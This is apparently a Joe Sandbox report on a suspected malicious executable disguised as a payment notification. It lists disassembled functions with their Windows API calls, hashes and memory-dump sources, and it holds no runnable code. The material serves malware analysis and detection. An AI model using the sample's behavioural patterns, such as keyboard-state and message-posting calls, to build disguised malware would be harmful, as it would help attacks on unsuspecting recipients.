Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 3f6aab8e5be80288e4285f205110d09640ae25cb971ca33a8d665466aa5a4fba
Instruction ID: cbe8504edcaada2225836656eb47aad352577e3473550140ba440c2ada66cde3
Opcode Fuzzy Hash: 3f6aab8e5be80288e4285f205110d09640ae25cb971ca33a8d665466aa5a4fba
Instruction Fuzzy Hash: 5811507168D30ABBEF00AB19DC83DAE779CDF5531DB20002AF904A61C2D7745E405374

Function 0099ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0099ED2A
_wcslen.LIBCMT ref: 0099ED3B
_wcslen.LIBCMT ref: 0099ED79
_wcslen.LIBCMT ref: 0099EDAF
_wcslen.LIBCMT ref: 0099EDDF
_wcslen.LIBCMT ref: 0099EDEF
_wcslen.LIBCMT ref: 0099EE2B
_wcslen.LIBCMT ref: 0099EE5A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 992ef82d673d2f05c56ae2a87af02a3b54ad7d4296949f8b390fe83cf571b001
Instruction ID: 00360e3edbf9ed529d151efb88b501c59e4133a94a3303b7fa89d3080930355a
Opcode Fuzzy Hash: 992ef82d673d2f05c56ae2a87af02a3b54ad7d4296949f8b390fe83cf571b001
Instruction Fuzzy Hash: BA41B565C1011875CB11EBF5888AACFB7BCEF85711F508466F924E3121FB34E249C7A5

Function 0094F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0098682C,00000004,00000000,00000000), ref: 0094F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0098682C,00000004,00000000,00000000), ref: 0098F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0098682C,00000004,00000000,00000000), ref: 0098F454

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: eac28d5d630756ee37a7cb70aac7ae26bf3f80b31e9b3cde458e7e7eee1965f0
Instruction ID: de974ae574c7f739c37d204ca5f75350a6871adc384fc726ef016c156f8892da
Opcode Fuzzy Hash: eac28d5d630756ee37a7cb70aac7ae26bf3f80b31e9b3cde458e7e7eee1965f0
Instruction Fuzzy Hash: BF414B30618682FAD7399F38C9B8F6A7F99AF96350F14543DE08B52661C735A880DB11

Function 009C2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 009C2D1B
GetDC.USER32(00000000), ref: 009C2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009C2D2E
ReleaseDC.USER32(00000000,00000000), ref: 009C2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009C2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009C2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 009C2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009C2DE1

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 77a0b9afab0b812d2cf5c4c055755a42a9e0515aad620d2cfa7a94345aec215f
Instruction ID: f3d69383a13003605f0fd26a311864689d5273526091b66d9c953e05cf0dbb39
Opcode Fuzzy Hash: 77a0b9afab0b812d2cf5c4c055755a42a9e0515aad620d2cfa7a94345aec215f
Instruction Fuzzy Hash: AB319AB2615214BFEB218F50CC8AFEB3FADEF19751F084055FE099A291C6759C41CBA1

Function 00995622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00995637
_memcmp.LIBVCRUNTIME ref: 00995659
_memcmp.LIBVCRUNTIME ref: 00995671
_memcmp.LIBVCRUNTIME ref: 00995684
_memcmp.LIBVCRUNTIME ref: 0099569E
_memcmp.LIBVCRUNTIME ref: 009956B1
_memcmp.LIBVCRUNTIME ref: 009956C9
_memcmp.LIBVCRUNTIME ref: 009956E4

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: fbbc9e6fd08aa429091621844a07e57c571b0169928a89994145200ad9bcbde3
Instruction ID: dc68dc38bd0c8bc57d303ceb5429d1d3aa3df7ee1d6c3f691f0de680cc19130f
Opcode Fuzzy Hash: fbbc9e6fd08aa429091621844a07e57c571b0169928a89994145200ad9bcbde3
Instruction Fuzzy Hash: 0A213B61B80A0977DE169E299DA2FFB334DAFA0389F450024FD049A581F730EE1483A6

Function 009B4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 009B502E, 009B5383
Not an Object type, xrefs: 009B5007

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: b4b0d37c639ecb3c4f3dcb4a15d47652b8c91f933dd8de459bcd49a874adcc01
Instruction ID: a9808212dc2c43401c224315acdd4bad3930acd97edd554df2844128b715e51d
Opcode Fuzzy Hash: b4b0d37c639ecb3c4f3dcb4a15d47652b8c91f933dd8de459bcd49a874adcc01
Instruction Fuzzy Hash: EDD1B171A0060A9FDF14DF98C980FEEB7B9BF88364F158469E915AB280E770DD41CB90

Function 00971522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,009717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 009715CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00971651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,009717FB,?,009717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009716E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009716FB

Part of subcall function 00963820: RtlAllocateHeap.NTDLL(00000000,?,00A01444,?,0094FDF5,?,?,0093A976,00000010,00A01440,009313FC,?,009313C6,?,00931129), ref: 00963852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,009717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00971777
__freea.LIBCMT ref: 009717A2
__freea.LIBCMT ref: 009717AE

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 2b27ec27726d2264c0d581d42409f040737ef99be77b8008aa0bc123e7490e69
Instruction ID: 820f737e17236318c8ecbfa83ae798fba4b53078f2b3b1b548910306ce903d0c
Opcode Fuzzy Hash: 2b27ec27726d2264c0d581d42409f040737ef99be77b8008aa0bc123e7490e69
Instruction Fuzzy Hash: 19919473E142169BDF288E6CC882AEE7BB99F85710F188659F809E7141E735DD40CBA0

Function 009B4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009B4648
VariantInit.OLEAUT32(?), ref: 009B4749
VariantClear.OLEAUT32(?), ref: 009B4753
VariantClear.OLEAUT32(?), ref: 009B47B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 009B472C
Null Object assignment in FOR..IN loop, xrefs: 009B45D8, 009B4706, 009B47BE

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 4b3963d965fa6d4b5f90239833b60e0503caf170a7fd3cb6f45bf4d6f027cfd4
Instruction ID: 41e473b63c33b76ce7e1f233d2c42e9c54ad6394ad3ccbf4ff9ed3565cfe9858
Opcode Fuzzy Hash: 4b3963d965fa6d4b5f90239833b60e0503caf170a7fd3cb6f45bf4d6f027cfd4
Instruction Fuzzy Hash: 10919371A00219EBDF20CFA4C984FEEBBB8EF46724F108559F505AB282D7709945DFA0

Function 009A1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 009A125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 009A1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009A12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009A12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009A135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009A13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009A1430

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 87854b478913809faedc4d96a6eaca61ff1004fac02518d9d59e5b7969b0ccc6
Instruction ID: 55cccad0d46074b44232d4a74f0f23ce3f009a9e3aecc51c9e71d94e3379bbb4
Opcode Fuzzy Hash: 87854b478913809faedc4d96a6eaca61ff1004fac02518d9d59e5b7969b0ccc6
Instruction Fuzzy Hash: E091C171A00209AFDB04DF98C885BBEB7B9FF86315F104429E951EB2A1D774E941CB90

Function 0094948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: be62930564a44316565574263a880e42c5a1c1d3b1e80dbb05e3c83462517765
Instruction ID: 3cc908c2e8503d76cf1d685f6255f9b6459ea10021c9ff052f3942d81bfb5d55
Opcode Fuzzy Hash: be62930564a44316565574263a880e42c5a1c1d3b1e80dbb05e3c83462517765
Instruction Fuzzy Hash: EE911571D04219AFCB10CFA9C884EEEBBB8FF89320F244559E915B7251D378A941DB60

Function 009B3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009B396B
CharUpperBuffW.USER32(?,?), ref: 009B3A7A
_wcslen.LIBCMT ref: 009B3A8A
VariantClear.OLEAUT32(?), ref: 009B3C1F

Part of subcall function 009A0CDF: VariantInit.OLEAUT32(00000000), ref: 009A0D1F
Part of subcall function 009A0CDF: VariantCopy.OLEAUT32(?,?), ref: 009A0D28
Part of subcall function 009A0CDF: VariantClear.OLEAUT32(?), ref: 009A0D34

Strings

AUTOIT.ERROR, xrefs: 009B3A80, 009B3A85
Incorrect Parameter format, xrefs: 009B39A6, 009B3BA1

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 5575664d255c4837df7bf2be9376b89171ec9ab00974b29b27ed1e483c0193e9
Instruction ID: dcc8327f8f6500f849124f21a28169e824b4aba46ace8f91106810fa0ea8d4b8
Opcode Fuzzy Hash: 5575664d255c4837df7bf2be9376b89171ec9ab00974b29b27ed1e483c0193e9
Instruction Fuzzy Hash: 719146756083059FCB14DF68C580A6ABBE8FF88724F14882DF88997351DB30EE05CB92

Function 009B4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0099000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0098FF41,80070057,?,?,?,0099035E), ref: 0099002B
Part of subcall function 0099000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0098FF41,80070057,?,?), ref: 00990046
Part of subcall function 0099000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0098FF41,80070057,?,?), ref: 00990054
Part of subcall function 0099000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0098FF41,80070057,?), ref: 00990064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 009B4C51
_wcslen.LIBCMT ref: 009B4D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 009B4DCF
CoTaskMemFree.OLE32(?), ref: 009B4DDA

Strings

NULL Pointer assignment, xrefs: 009B4E23, 009B4E52

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 3bce7f8032e116b5f5898a26ae24916eade54238f9975df8a4bf30157df7d271
Instruction ID: ea13c7ff034d9a7dcda2fff846b25af2427926403edb4ca1a56fb1e39c0fb277
Opcode Fuzzy Hash: 3bce7f8032e116b5f5898a26ae24916eade54238f9975df8a4bf30157df7d271
Instruction Fuzzy Hash: 57910771D0021DAFDF14DFA4C891AEEBBB8BF48310F108569E919A7291DB749A44DFA0

Function 009C20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 009C2183
GetMenuItemCount.USER32(00000000), ref: 009C21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009C21DD
_wcslen.LIBCMT ref: 009C2213
GetMenuItemID.USER32(?,?), ref: 009C224D
GetSubMenu.USER32(?,?), ref: 009C225B

Part of subcall function 00993A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00993A57
Part of subcall function 00993A3D: GetCurrentThreadId.KERNEL32 ref: 00993A5E
Part of subcall function 00993A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009925B3), ref: 00993A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009C22E3

Part of subcall function 0099E97B: Sleep.KERNEL32 ref: 0099E9F3

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 6a3dd26c85f42950c9cfa0c61695d36776b9b8f417e970d7aa86f23fad82782e
Instruction ID: f6b837a4fede269e44a106bbc8175dfc72093bc6848205ba462389dd7da4e42e
Opcode Fuzzy Hash: 6a3dd26c85f42950c9cfa0c61695d36776b9b8f417e970d7aa86f23fad82782e
Instruction Fuzzy Hash: 5F716C75E04205AFCB14EF68C845FAEBBF5EF88320F148459E826AB351D734AE418F91

Function 0099AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0099AEF9
GetKeyboardState.USER32(?), ref: 0099AF0E
SetKeyboardState.USER32(?), ref: 0099AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0099AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0099AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0099AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0099B020

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: fc613676b91c14ec3c5fcfa991d3614167818705a775560e3cc049b62bd6534b
Instruction ID: b053b7266a0d1131023ef32d7b1ab0ea5b9b4c2aca0f12a18bbc5a2d054c3872
Opcode Fuzzy Hash: fc613676b91c14ec3c5fcfa991d3614167818705a775560e3cc049b62bd6534b
Instruction Fuzzy Hash: 9551A1A0A147D53DFF36433C8D49BBABEAD9B06304F088589E1E9558C2D3D9ACC8D791

Function 0099ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0099AD19
GetKeyboardState.USER32(?), ref: 0099AD2E
SetKeyboardState.USER32(?), ref: 0099AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0099ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0099ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0099AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0099AE38

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 20e796e70cadfc83aa1ada79575301cba1e18ffc56072e2a0b824d5e413809c2
Instruction ID: 8cefecfda9f8bc29b6af244c6bc366715425143ddc423feb19d5cfaae7c0bc8f
Opcode Fuzzy Hash: 20e796e70cadfc83aa1ada79575301cba1e18ffc56072e2a0b824d5e413809c2
Instruction Fuzzy Hash: 6151E6A19087D53DFF3783788C55B7A7EACDB46300F088488E1D9468C2D394EC88E7A2

Function 0096542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00973CD6,?,?,?,?,?,?,?,?,00965BA3,?,?,00973CD6,?,?), ref: 00965470
__fassign.LIBCMT ref: 009654EB
__fassign.LIBCMT ref: 00965506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00973CD6,00000005,00000000,00000000), ref: 0096552C
WriteFile.KERNEL32(?,00973CD6,00000000,00965BA3,00000000,?,?,?,?,?,?,?,?,?,00965BA3,?), ref: 0096554B
WriteFile.KERNEL32(?,?,00000001,00965BA3,00000000,?,?,?,?,?,?,?,?,?,00965BA3,?), ref: 00965584

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 825bc78feddafd418d246dbec7aa9132f2f43a19a46b00036584325cbf259557
